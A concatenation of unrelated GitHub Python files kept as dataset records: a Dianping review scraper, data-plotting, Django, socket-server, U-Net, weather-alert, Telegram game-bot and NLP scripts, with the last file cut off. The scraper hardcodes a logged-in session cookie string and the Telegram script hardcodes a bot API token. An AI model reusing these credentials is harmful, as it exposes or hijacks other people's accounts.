'Referer': 'http://www.dianping.com/shop/9951593',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest'\n}\n\nraw_data = \"cy=2311; _lxsdk_cuid=164e476a159c8-0d29a955cfd024-2711938-1fa400-164e476a15ac8; _lxsdk=164e476a159c8-0d29a955cfd024-2711938-1fa400-164e476a15ac8; _hc.v=945ccfd5-f0ef-5ced-96a6-57b81e5368d1.1532841337; s_ViewType=1; ua=dpuser_4252403616; ctu=0c4ac1d1f837a576bedf3401825fa1532dcac384129922ab18742b378372f91f; __mta=88340260.1532841356020.1532966725733.1533207768798.9; JSESSIONID=2376D714B00477B84DDBE15F56A6B3A4; _thirdu.c=cce17ce5b0b1058454459bc4e82e1b49; lgtoken=08fe9c1c8-b423-4c44-b226-f86a6fcf0845; thirdtoken=91385117C0E327C3C7653E4050175B65; dper=a74568066ab518cd86edf71992682dfcfa816ed7ed2d69cb9ad21f48efcc361f2d51b7bf4b414083dbcac3425b0cebb36cacc3cd80cfd57a853f5906324fabeb23246eae3ed28e1254ca54f9e74b9636dbe4fcdbea91d8444d02b1782a2325e9; ll=7fd06e815b796be3df069dec7836c3df; uamo=85023591; _lxsdk_s=1668764b4ed-5b9-d82-f72%7C%7C82\"\ncookie = SimpleCookie()\ncookie.load(raw_data)\n\ncookies = {}\nfor key, morsel in cookie.items():\n cookies[key] = morsel.value\n\n\ndef get_reviews_from_api(shop_id):\n params[\"shopId\"] = int(shop_id)\n review_list = list() # store all the reviews crawled\n dish_list = list() # store all the dish names crawled\n\n try:\n print(\"fetching data - \" + shop_id)\n r = requests.get(url, params=params, headers=headers, cookies=cookies)\n # print(r.text)\n resp = r.json()\n\n dish_list.extend(resp[\"dishTagStrList\"])\n reviews = resp[\"reviewDataList\"]\n for review in reviews:\n restaurant_id = review[\"shopId\"]\n user_id = review[\"userId\"]\n body = review[\"reviewBody\"]\n star = review[\"star\"][\"value\"]\n add_time = review[\"addTime\"]\n review_list.append([restaurant_id, user_id, body, star, add_time])\n \n # Consolidate all the reviews into csv\n with open(\"reviews.csv\", \"a\", encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for review in review_list:\n # print(review)\n writer.writerow(review)\n\n except Exception as e:\n print(\"Error in requesting from \" + shop_id)\n print(e)\n return None\n\n\nwith open(\"data/restaurant-sg.txt\", \"r\") as restaurant_file:\n for line in restaurant_file:\n print(\"Crawling start - \" + line)\n parts = line.split('/')\n shop_id = parts[len(parts) - 1]\n get_reviews_from_api(shop_id)\n time.sleep(1)\n","repo_name":"hbwzhsh/sentiment-analysis-cn","sub_path":"dianping-sg-comments-restful.py","file_name":"dianping-sg-comments-restful.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25756746314","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\r\ndf = pd.read_csv(\"C:\\\\Users\\\\raks2\\\\Downloads\\\\iphone_purchase_records.csv\")\r\nprint(df)\r\n\r\nprint(df.describe())\r\n\r\n\r\nmales_above_25_df = df.loc[(df[\"Gender\"] == \"Male\") & (df[\"Age\"]>25) & (df[\"Purchase Iphone\"]== 1)]\r\nprint(males_above_25_df)\r\nfig_001 = px.bar(x=males_above_25_df.Age, y =males_above_25_df.Salary, title=\"Males above the age of 25\", labels = {\"Age\": \"Age\", \"Salary\": \"Salary\"})\r\nfig_001.update_layout(xaxis_title=\"Age\", yaxis_title = \"Salary\")\r\nfig_001.show()\r\n\r\n\r\n\r\n\r\nfemale_above_30k_df = df.loc[(df[\"Gender\"] == \"Female\") & (df[\"Salary\"] > 30000) & (df[\"Purchase Iphone\"]== 1)]\r\nprint(female_above_30k_df)\r\nfig_002 = px.scatter(data_frame=female_above_30k_df, x= \"Age\", y=\"Salary\", title=\"Females above the salary of 30k\", size=\"Salary\", labels = {\"Age\": \"Age\", \"Salary\": \"Salary\"})\r\nfig_002.update_layout(xaxis_title=\"Age\", yaxis_title=\"Salary\")\r\nfig_002.show()\r\n\r\n\r\n\r\nsalary_desc_df = df.sort_values(by = [\"Salary\"], ascending= False)\r\nmale_buyer_salAbove_50k_df = df.loc[(df[\"Salary\"]>=50000) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Male\")]\r\nfemale_buyer_salAbove_50k_df = df.loc[(df[\"Salary\"]>=50000) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Female\")]\r\nfig_003 = go.Figure(go.Scatter(x = male_buyer_salAbove_50k_df.Age, y=male_buyer_salAbove_50k_df.Salary, name = \"Male\", mode = 'lines'))\r\nfig_003.add_trace(go.Scatter( x = female_buyer_salAbove_50k_df.Age, y=female_buyer_salAbove_50k_df.Salary, name = \"Female\", mode = 'lines'))\r\nfig_003.update_layout(title=\"Buyers above 50k Salary\",xaxis_title = \"Age of Buyers\", yaxis_title = \"Salary of Buyers\")\r\nfig_003.show()\r\n#print(buyer_salAbove_50k_df)\r\n\r\n\r\n\r\n\r\nmalebuyer_below30 = df.loc[(df[\"Age\"]<=30) & (df[\"Purchase Iphone\"] == 1) &(df[\"Gender\"] == \"Male\")]\r\nfemalebuyer_below30 = df.loc[(df[\"Age\"]<=30) & (df[\"Purchase Iphone\"] == 1) & (df[\"Gender\"] == \"Female\")]\r\nfig_004 = go.Figure(go.Scatter(x = malebuyer_below30.Age, y = malebuyer_below30.Salary, mode = \"markers\", name=\"Male\",showlegend=True, marker_size = [20,30,40,50]))\r\nfig_004.add_trace(go.Scatter(x = femalebuyer_below30.Age, y = femalebuyer_below30.Salary, mode = \"markers\", name=\"Female\", marker_size = [20,30]))\r\nfig_004.update_layout(title = \"Buyers below the age of 30\", xaxis_title = \"Age\", yaxis_title = \"Salary\")\r\nfig_004.show()\r\n\r\n#print(buyer_below30)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Rax2147/iphone-sales-analysis-project","sub_path":"apl_file_1.py","file_name":"apl_file_1.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1724474617","text":"from django import forms\nfrom .validators import validate_file_size\n\nSEND_TO_OPTIONS = [\n (\"exec\", \"All Exec\"),\n (\"preswelfare\", \"President, Welfare & Inclusivity\"),\n (\"president\", \"President\"),\n (\"secretary\", \"Secretary\"),\n (\"treasurer\", \"Treasurer\"),\n (\"academic\", \"Academic Coordinator\"),\n (\"gaming\", \"Gaming Coordinator\"),\n (\"tech\", \"Tech Officer\"),\n (\"inclusivity\", \"Inclusivity Officer\"),\n (\"socials\", \"Social Secretary\"),\n (\"welfare\", \"Welfare Officer\"),\n]\n\n\nclass ReportForm(forms.Form):\n send_to = forms.CharField(widget=forms.Select(choices=SEND_TO_OPTIONS))\n message = forms.CharField(widget=forms.Textarea, required=True)\n ev_file = forms.FileField(required=False, validators=[validate_file_size])\n","repo_name":"UWCS/uwcs-dextre","sub_path":"report/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39869992715","text":"import requests as rq\r\nimport math\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\nclass webscraping:\r\n def fetch_game_status(web):\r\n if web.status_code == 404: return print(f'Invalid . . . {web.url}')\r\n new = bs(web.text, 'html.parser') # Let's BeautifulSoup read text respone from request.\r\n web.close()\r\n fetch = new.find_all(\"p\", {\"class\":\"text-lead font-caption-body wait-for-i18n-format-render\"}) # Fetch data that's format with header and classes. // form to array.\r\n\r\n data = str(fetch[0]).split('

')[1].split('

')[0] # spliting texts for capture only data.\r\n data2 = str(fetch[3]).split('

')[1].split('

')[0] # same as upper one. // we put string because they have non-type\r\n data = data.split(',') # The data of first one return string value with \",\" so we need to cut it then Transfer to Integers.\r\n formator_data1 = int(data[0]+data[1]) # from the upper one, we have splited \",\" so new the list data looks like this ('num', 'num2') and now format it.\r\n formator_data2 = int(data2)\r\n\r\n print(f'\\n\\nPlaying : {formator_data1} (Real-time)')\r\n print(f'Max players : {formator_data2} (Per Room)')\r\n print(f'Server Total : {math.floor(formator_data1/formator_data2)} (Around the following)') # Calculate total of servers\r\n\r\nif __name__ == '__main__':\r\n gets = str(input('Enter game id : ')) # insert game's id.\r\n url = f\"https://www.roblox.com/games/{gets}/\"\r\n web = rq.get(url) # Send Request to webpage.\r\n runtime = webscraping.fetch_game_status(web) # main dish\r\n","repo_name":"latatan/Rei.py","sub_path":"rei.py","file_name":"rei.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9083994570","text":"from datetime import datetime, timedelta\nfrom collections import defaultdict\n\n\nusers = [{\"name\": \"Roblen\", \"birthday\": datetime(2000, 1, 3)},\n {\"name\": \"Lunio\", \"birthday\": datetime(1942, 7, 23)},\n {\"name\": \"Persostrat\", \"birthday\": datetime(1988, 5, 22)},\n {\"name\": \"Pores\", \"birthday\": datetime(1987, 5, 22)},\n {\"name\": \"Yavliga\", \"birthday\": datetime(2002, 7, 30)},\n {\"name\": \"Nikoglay\", \"birthday\": datetime(1976, 7, 27)},\n {\"name\": \"Bucefal\", \"birthday\": datetime(2004, 5, 22)},\n {\"name\": \"Lubomir\", \"birthday\": datetime(1950, 7, 23)},\n {\"name\": \"Sigizmund\", \"birthday\": datetime(1078, 7, 22)},\n {\"name\": \"Melaniya\", \"birthday\": datetime(1996, 7, 27)},\n {\"name\": \"Aslan\", \"birthday\": datetime(2001, 8, 1)},\n {\"name\": \"Oxana\", \"birthday\": datetime(1995, 7, 28)}]\n\n\nweek = {\n 0: \"Monday\",\n 1: \"Tuesday\",\n 2: \"Wednesday\",\n 3: \"Thursday\",\n 4: \"Friday\",\n 5: \"Saturday\",\n 6: \"Sunday\",\n \"next\": \"Next Monday\"\n}\n\ncelebrate_dict = defaultdict(list)\n\n\ndef get_birthdays_per_week(users):\n delta_forward = timedelta(days=7)\n delta_back = timedelta(days=2)\n\n current_date = datetime.now().date()\n finish_diapazon = current_date + delta_forward\n start_diapazon = current_date - delta_back\n\n celebrate_list = []\n\n for user in users:\n birth_day = user[\"birthday\"].date()\n birth_day = birth_day.replace(year=current_date.year)\n\n if start_diapazon <= birth_day <= finish_diapazon:\n birth_day_weekday = birth_day.weekday()\n\n if start_diapazon <= birth_day < current_date and birth_day_weekday in (5, 6) and current_date.weekday() == 0:\n user.update({\"today\": True})\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} было в {week[ birth_day_weekday]} нужно поздравить сегодня\")\n\n elif current_date == birth_day and birth_day_weekday in (5, 6):\n celebrate_list.append(user)\n print(f\"Готовьтесь поздравлять в понедельник {user['name']}\")\n\n elif current_date == birth_day:\n celebrate_list.append(user)\n print(f\"Бегите уже поздравлять {user['name']}\")\n\n elif current_date < birth_day <= finish_diapazon and birth_day_weekday in range(5, 6+1):\n user.update({\"next\": True})\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} только будет в {week[ birth_day_weekday]} нужно поздравить в следующий понедельник\")\n\n elif current_date < birth_day <= finish_diapazon and (birth_day_weekday in range(0, 4+1)):\n celebrate_list.append(user)\n print(\n f\"День рожденя {user['name']} будет в {week[ birth_day_weekday]} нужно поздравить\")\n\n for celebrator in celebrate_list:\n\n if celebrator.get(\"next\"):\n week_day = week[\"next\"]\n celebrate_dict[week_day].append(celebrator[\"name\"])\n continue\n\n elif celebrator.get(\"today\"):\n week_day = week[0]\n celebrate_dict[week_day].append(celebrator[\"name\"])\n continue\n\n birth_day = celebrator[\"birthday\"].date()\n birth_day = birth_day.replace(year=current_date.year)\n birth_day_weekday = birth_day.weekday()\n week_day = week[birth_day_weekday]\n\n celebrate_dict[week_day].append(celebrator[\"name\"])\n\n result = {\"Monday\": celebrate_dict.get(\"Monday\", []),\n \"Tuesday\": celebrate_dict.get(\"Tuesday\", []),\n \"Wednesday\": celebrate_dict.get(\"Wednesday\", []),\n \"Thursday\": celebrate_dict.get(\"Thursday\", []),\n \"Friday\": celebrate_dict.get(\"Friday\", []),\n \"Saturday\": celebrate_dict.get(\"Saturday\", []),\n \"Sunday\": celebrate_dict.get(\"Sunday\", []),\n \"Next Monday\": celebrate_dict.get(\"Next Monday\", []), }\n\n print(result)\n return (result)\n\n\nget_birthdays_per_week(users)\n","repo_name":"Yevhenii3145/python-core-home_work_8","sub_path":"get_birthdays_per_week.py","file_name":"get_birthdays_per_week.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29622792715","text":"import socket\nimport sys\nimport threading\nfrom datetime import datetime\n\n\nclass ClientThread(threading.Thread):\n def _init_(self, clientAddress, clientsocket):\n threading.Thread._init_(self)\n self.csocket = clientsocket\n\n def run(self):\n global cn\n self.csocket.send(bytes(\"Hi, I am the Server..\",'utf-8'))\n print(\"Connection from : \", cn)\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(\"Current Time =\", current_time)\n msg = ''\n while True:\n data = self.csocket.recv(2048)\n msg = data.decode()\n if msg == 'bye':\n cn=cn-1\n break\n print(\"from client\", msg)\n self.csocket.send(bytes(msg[::-1], 'UTF-8'))\n print(\"Client at \", clientAddress, \" disconnected...\")\n\ncn=0\nLOCALHOST = \"127.0.0.1\"\nPORT = int(sys.argv[1])\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver.bind((LOCALHOST, PORT))\nprint(\"Server started\")\nprint(\"Waiting for client request..\")\nwhile True:\n server.listen(1)\n clientsock, clientAddress = server.accept()\n cn=cn+1\n newthread = ClientThread(clientAddress, clientsock)\n newthread.start()","repo_name":"mkk96/SSD-Labs","sub_path":"Lab 11/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30160478066","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nfrom torchvision.transforms import transforms\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import make_grid, save_image\n\nfrom utilis.DataHelper import *\n\n# Chose models\nfrom networks.U_Net import UNet # U-Net\nfrom networks.Attention_UNet import Att_UNet # Attention U-Net\nfrom networks.AB_UNet import AB_UNet # AB-UNet\nfrom utilis.utilis import ImageEval_\n\n# CUDA\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\ndef show(img):\n \"\"\" Prediction visualization \"\"\"\n\n plt.figure(figsize=(12, 8))\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)), interpolation='nearest')\n plt.show()\n\n\ndef test():\n # Normalization\n x_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5])\n ])\n\n y_transform = transforms.ToTensor()\n\n batch_size = 1\n\n PATH = r'E:\\CPP\\AutoEncoder\\model\\threshold\\UNetRev-0.20-4.pth'\n\n # Load Test dataset\n test_root = r'D:\\CPP\\ThresholdDataset3.0\\TR\\test\\0.20'\n label_root = r'D:\\CPP\\ThresholdDataset3.0\\Gray\\test\\0.20'\n test_set = EvalDataset(img_root=test_root,\n label_root=label_root,\n transform=x_transform,\n target_transform=y_transform)\n test_dataloader = DataLoader(test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4)\n\n # Load mdoel\n model = AB_UNet(1, 1).to(device)\n\n # Load dict\n model.load_state_dict(torch.load(PATH, map_location=lambda storage, loc: storage))\n\n model.eval()\n\n psnr_ = []\n ssim_ = []\n with torch.no_grad():\n for index, batches in enumerate(test_dataloader):\n images, labels = batches\n\n # CUDA\n images = images.to(device)\n labels = labels.to(device)\n\n predicts = model(images)\n\n # Visualize\n save_image(predicts, r\"D:\\Threshold_Test\\recon\\0.20\\{}.png\".format(index + 1), normalize=True,\n range=(-1, 1), scale_each=False, pad_value=0)\n show(make_grid(predicts, normalize=True, range=(-1, 1), scale_each=False, pad_value=0))\n\n # Calculate SSIM & PSNR\n ImageEval1 = ImageEval_(predicts.clamp(0.1, 1.0), labels, channel=1)\n ImageEval2 = ImageEval_(images.clamp(0.1, 1.0), labels, channel=1)\n psnr_score1 = ImageEval1.cal_psnr() # predict\n psnr_score2 = ImageEval2.cal_psnr() # img\n psnr_.append((psnr_score1, psnr_score2))\n\n ssim_score1 = ImageEval1.cal_ssim()\n ssim_score2 = ImageEval2.cal_ssim()\n ssim_.append((ssim_score1, ssim_score2))\n\n data_psnr = pd.DataFrame(psnr_)\n data_psnr.to_csv('csvs/psnr-thresh.csv')\n\n data_ssim = pd.DataFrame(ssim_)\n data_ssim.to_csv('csvs/ssim-thresh.csv')\n\n\nif __name__ == '__main__':\n print(\"Start Test >>>>>>>>>>>>>>>>\")\n test()\n print('######### Finished Test #########')\n","repo_name":"Panpan-Chen/Attention-Block-U-net","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26177957194","text":"import telebot\nfrom telebot import types\nimport random\n\nsweets = 2021\nMAX_SWEET = 28\nUSER = 'пользователь'\nBOT = 'бот'\nuser_sweet = 0\nflag = USER\nRULES = 'На столе лежит {} конфета. Ирок и бот делают ход друг после друга. Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем {} конфет. Победа достается игроку, если тот заберет последние конфеты.'.format(sweets, MAX_SWEET)\n\nbot = telebot.TeleBot('6026294172:AAFZzeoZbOXj_Thx8dB1iV5S1KzZwxXX-9w')\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n bot.send_message(message.chat.id, '/play')\n\n@bot.message_handler(commands=['play'])\ndef button(message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n rules = types.KeyboardButton('Правила игры')\n game = types.KeyboardButton('Начать игру')\n markup.add(rules)\n markup.add(game)\n bot.send_message(message.chat.id, 'Выберите действие :)', reply_markup=markup)\n\n@bot.message_handler(content_types='text')\ndef controller(message):\n global flag\n\n if message.text == 'Правила игры':\n bot.send_message(message.chat.id, message)\n button(message)\n elif message.text == 'Начать игру':\n first_turn = random.choice([BOT, USER])\n flag = USER if first_turn == USER else BOT\n\n bot.send_message(message.chat.id, 'Первым ходит - {}. /ok'. format(flag))\n bot.register_next_step_handler(message, game)\n\n@bot.message_handler(commands=['ok'])\ndef game(message):\n global sweets\n global flag\n\n if sweets > 0:\n if flag == USER:\n bot.send_message(message.chat.id, f'Возьми от 0 до {MAX_SWEET} конфет')\n bot.register_next_step_handler(message, user_turn)\n else:\n bot_turn(message)\n else:\n winner = USER if flag == BOT else BOT\n bot.send_message(message.chat.id, f'Победитель - {winner}!')\n button(message)\n\n@bot.message_handler(content_types='text')\ndef user_turn(message):\n global sweets\n global flag\n\n user_sweet = int(message.text)\n if user_sweet < 0 or user_sweet > 28:\n msg = bot.send_message(message.chat.id, 'Количество конфет должно быть от 0 до 28.')\n bot.register_next_step_handler(msg, user_turn)\n return\n \n sweets -= user_sweet\n if sweets > 0:\n bot.send_message(message.chat.id, f'Остаток конфет - {sweets}')\n else:\n bot.send_message(message.chat.id, 'Конфеты закончились.')\n flag = BOT\n game(message)\n\ndef bot_turn(message):\n global sweets\n global flag\n\n bot_sweet = random.randint(1, 28)\n bot.send_message(message.chat.id, f'Жадный бот забрал {bot_sweet} конфет')\n sweets -= bot_sweet\n if sweets > 0:\n bot.send_message(message.chat.id, f'Остаток конфет - {sweets}')\n else:\n bot.send_message(message.chat.id, 'Конфеты закончились.')\n flag = USER\n game(message)\n\nbot.polling(none_stop=True)","repo_name":"KovgardVA/Python_HomeWork","sub_path":"Seminar 9/tg_main.py","file_name":"tg_main.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71272541975","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport inspect\nimport os\nimport sys\nimport socket\n# set system paths for importing custom modules/functions\ncur_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nhostname = socket.gethostname()\nif '__file__' in globals():\n # if not running in debugger, assign parent directory of file to system paths\n parent_dir = os.path.dirname(os.path.dirname(cur_dir))\n sys.path.insert(0, os.path.join(parent_dir, 'blue2'))\nelse:\n # otherwise set system paths based on project directory in PyCharm\n sys.path.insert(0, os.path.join(cur_dir, 'blue2'))\n# import custom modules\nimport json\nfrom collections import OrderedDict\nfrom urllib.request import urlopen\n# custom modules\nfrom primary.maintools import Paths, DateTools, CSVHelper\nfrom logger.pylogger import Log\nfrom comm.commtools import PBullet\n\n\np = Paths()\n# initiate logging\nlogg = Log('severe_weather', p.log_dir, 'sevweather', 'DEBUG')\nlogg.debug('Logger initiated.')\n\nds_api = p.key_dict['darksky_api']\npb_api = p.key_dict['pushbullet_api']\n\ndtools = DateTools()\ncsvhelp = CSVHelper()\npb = PBullet(pb_api)\n\n# set location for query (home)\nloc = p.home_loc\n\nlogg.debug('Loading previous alert file')\nprev_alerts_path = os.path.join(p.data_dir, 'previous_alerts.csv')\n\nurl = \"https://api.darksky.net/forecast/{}/{}?units=si&exclude=currently,flags\".format(ds_api, loc)\nlogg.debug('Fetching DarkSky data from url: {}'.format(url))\ndarkskydata = urlopen(url).read().decode('utf-8')\ndata = json.loads(darkskydata)\n\n# collect info on weather alerts\nalerts = data.get('alerts')\nif alerts is not None:\n logg.debug('Alerts fetched:{}'.format(len(alerts)))\n if os.path.exists(prev_alerts_path):\n prev_alerts = csvhelp.csv_to_ordered_dict(prev_alerts_path)\n else:\n prev_alerts = None\n\n for alert in alerts:\n title = alert['title']\n regions = alert['regions']\n desc = alert['description']\n time_reported = dtools.unix_to_string(alert['time'], '%Y%m%d_%H%M%S')\n expires = dtools.unix_to_string(alert['expires'], '%Y%m%d_%H%M%S')\n expires_formatted = dtools.unix_to_string(alert['expires'], '%Y-%m-%d %H:%M:%S')\n if prev_alerts is not None:\n if not any(['{}-{}'.format(d['title'], d['reported']) == '{}-{}'.format(title, time_reported) for d in prev_alerts]):\n # if no matches in previous alerts file...\n # ... add new alerts to that file and send message\n new_alert_dict = OrderedDict((\n ('title', title),\n ('reported', time_reported),\n ('expiration', expires),\n ))\n pb.send_message('{} until {}'.format(title, expires_formatted), desc)\n # Add new alert dict to list\n prev_alerts.append(new_alert_dict)\n # Rewrite file to disk\n csvhelp.ordered_dict_to_csv(prev_alerts, prev_alerts_path)\nelse:\n logg.debug('No alerts found, ending.')\n\n\nlogg.close()\nsys.exit()\n\n","repo_name":"barretobrock/blue2","sub_path":"weather/severe_weather_check.py","file_name":"severe_weather_check.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28898166037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport re #추가\nfrom dotenv import load_dotenv\nimport pandas as pd\nfrom collections import Counter\nfrom datetime import datetime\nimport pickle\n\nfrom konlpy.tag import Komoran, Okt, Mecab\nfrom database import Database\nimport platform\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel, cosine_similarity\n\n\n#데이터 전처리 함수\ndef preprocessing(review):\n #한글 이외의 것 제거\n hangul = re.compile('[^가-힣]')\n review_text = hangul.sub(' ', review)\n\n # komoran를 사용해 형태소 단위로 쪼개주기\n # komoran = Komoran()\n # word_review = komoran.nouns(review_text)\n\n # Mecab 설치 (Komoran보다 훨씬 빠름)\n # https://velog.io/@jyong0719/konlpy-mecab-%EC%84%A4%EC%B9%98-window\n if platform.system() == \"Linux\":\n mecab = Mecab()\n else:\n mecab = Mecab(dicpath=os.environ.get('MECAB_DIR'))\n word_review = mecab.nouns(review_text)\n\n #불용어 제거하기\n fire_dragon = ['의', '이', '있', '하', '들', '그', '되', '수', '보', '않', '없', '나', '사람', '아', '등', '같', '오', '있','한']\n fire_dragon += ['여행', '사진', '시간', '정도', '생각', '지만', '절대', '니다', '', '그간', '남이', '조금', '후기', '사용', '도착', '때문', '보니', '안녕하세요',\n '이다', '한국', '이랑', '이번', '간다', '완전', '이건', '나름', '하면', '여기', '다음', '이후', '']\n word_review = list(set(word_review))\n fire_word = [w for w in word_review if not w in fire_dragon and len(w)>1]\n\n return fire_word #가볍게 전처리를 한 문자열 반환\n\n\n\n\nif __name__ == \"__main__\":\n # load .env\n load_dotenv()\n # os.environ['JAVA_HOME'] = os.environ.get('JAVA_HOME')\n\n # ./blog_data/ 폴더 밑에 있는 크롤링 csv파일 로드\n crawl_path = './blog_data/'\n file_list = os.listdir(crawl_path)\n file_list = sorted(file_list, key=lambda x: int(x.split('_')[0])) # 파일명 순서대로 정렬\n\n # Database에서 country id 가져오기\n db = Database()\n\n country_word_list = []\n\n for file in file_list:\n country_name = file.split('_')[1]\n res = db.select(f'select id from country where name=\"{country_name}\"')\n if len(res) == 0:\n continue\n\n country_id = res[0][0]\n\n # pandas csv 파일 읽기\n # Buffer overflow 관련 오류로 lineterminator 파라미터 추가\n data = pd.read_csv(crawl_path + file)\n word_set = []\n\n for idx, content in enumerate(data['contents']):\n try:\n final_word_list = preprocessing(content)\n word_set.extend(final_word_list)\n except Exception as e:\n if str(e).find('expected string or bytes-like object') != -1:\n continue\n print(e)\n\n # print(wc)\n wc = dict(Counter(word_set).most_common())\n wc = dict(filter(lambda x:x[1] > 10, wc.items())) # 10번 이상 들어간 값만 추출\n country_word_list.append(\" \".join(word_set)) # pickle로 저장할 데이터\n\n print(f\"{country_id}_{country_name} : LENGTH={len(str(wc))}\")\n print(\"=\" * 50)\n\n # Database 데이터 insert (값이 있으면 UPDATE)\n cur_time = datetime.today().strftime(\"%Y/%m/%d %H:%M:%S\")\n query = f'INSERT INTO country_data VALUES({country_id}, \"{str(wc)}\", now())' \\\n f'ON DUPLICATE KEY UPDATE id=\"{country_id}\", contents=\"{str(wc)}\", upload_time=now();'\n\n # db.query(query)\n\n db.close()\n\n\n # TF-IDF벡터 pickle 파일로 저장\n vectorizer = TfidfVectorizer(max_features=500) # 상위 500단어 추출\n tfidf_matrix = vectorizer.fit_transform(country_word_list)\n\n cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n cosine_sim = np.array(cosine_sim)\n\n # Cosine 벡터 pickle로 저장\n with open('data.pickle', 'wb') as f:\n pickle.dump(cosine_sim, f)\n print('data.pickle 저장 완료')","repo_name":"kookmin-sw/capstone-2023-14","sub_path":"DM/csv_to_db.py","file_name":"csv_to_db.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12293207541","text":"import pickle\nfrom multilang_summarizer.lemmatizer import Lemmatizer\nimport xml.etree.ElementTree as ET\nfrom multilang_summarizer.summarizer import Document, summarizer, clean_working_memory, summary_limit, summary_wordlimit\n\nfrom multilang_summarizer.readability import flesch_kincaid\n\nimport random\n\nimport os\n\ntest_dir = \"./test_documents/en/\"\noutput_dir = \"./output_documents/en/\"\n\ncurrent_source = 1\nfor f_path in os.listdir(test_dir):\n if not f_path.endswith(\".txt\"):\n document_path = test_dir + f_path\n tree = ET.parse(document_path)\n root = tree.getroot()\n original_text = root.find(\"TEXT\").text\n with open(test_dir + \"%d.txt\" % current_source, \"w\") as fp:\n fp.write(original_text)\n current_source += 1\n\n# Try to create needed dirs in the beginning\ntry:\n os.makedirs(output_dir)\nexcept:\n pass\n\n# Cleanup\nclean_working_memory()\n\nfor f_path in os.listdir(output_dir):\n os.remove(output_dir + f_path)\n\n# Read input paths\npaths = []\nfor f_path in os.listdir(test_dir):\n if f_path.endswith(\".txt\"):\n paths.append(test_dir + f_path)\n\nrandom.shuffle(paths)\n\nlemmatizer = Lemmatizer.for_language(\"en\")\n\nRS = {}\nscores = {}\nfor path in paths:\n RS[1], scores[1] = summarizer(path, \"f1\", \"partial\", lemmatizer, 11)\n RS[2], scores[2] = summarizer(path, \"f1\", \"probabilistic\", lemmatizer, 12)\n RS[3], scores[3] = summarizer(path, \"f1\", \"lcs\", lemmatizer, 13)\n\n RS[4], scores[4] = summarizer(path, \"f2\", \"partial\", lemmatizer, 14)\n RS[5], scores[5] = summarizer(path, \"f2\", \"probabilistic\", lemmatizer, 15)\n RS[6], scores[6] = summarizer(path, \"f2\", \"lcs\", lemmatizer, 16)\n\n RS[7], scores[7] = summarizer(path, \"f3\", \"partial\", lemmatizer, 17)\n RS[8], scores[8] = summarizer(path, \"f3\", \"probabilistic\", lemmatizer, 18)\n RS[9], scores[9] = summarizer(path, \"f3\", \"lcs\", lemmatizer, 19)\n\n print(\"Processed:\", path)\n\nbyte_limit = 661 # bytes\nfor i in range(1, 10):\n limited_summary = summary_limit(RS[i].aligned_sentences, scores[i],\n byte_limit)\n raw_limited_summary = \"\\n\".join([raw_sent for raw_sent, _, _ in\\\n limited_summary])\n with open(output_dir + \"limited_summary_%d.txt\" % i, \"w\") as fp:\n 